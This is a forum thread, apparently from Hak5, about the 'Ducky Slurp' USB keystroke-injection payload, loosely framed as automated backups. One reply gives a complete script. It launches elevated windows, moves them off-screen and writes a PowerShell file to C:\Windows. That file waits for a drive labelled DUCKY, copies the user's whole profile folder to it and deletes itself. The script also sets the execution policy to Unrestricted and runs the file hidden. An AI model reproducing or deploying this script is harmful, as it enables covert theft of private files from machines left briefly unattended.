Jump to content

Recommended Posts

Define Exfiltration: an antonym for infiltration, may stand for: The same as extraction (military) (also exfil).

Automated backups. You could regularly copy files to a backup location and the ducky could be used to perform the actions faster and automatic.

Link to post
Share on other sites

Pretty much.

The USB makes it nice because if you happen to run out of time, the slurp just runs in the background until you return with the USB key.

Darren did an episode of Hak5 on this script, I don't know the episode off the top of my head, but I'm sure it can't be too hard to find.

Link to post
Share on other sites

If your interested I have a slighty different version of the Ducky Slurp. Same premise as Darrens and Overwraiths just written in PowerShell.

DELAY 3000
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\'
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
ENTER
STRING copy-item $userDir $usbPath.Name -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1500
STRING C:\Windows\config.ps1
ENTER
DELAY 2000
ALT F4
DELAY 200
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1000
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

There is also a USB Reporting method on the Duck Toolkit.

411.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...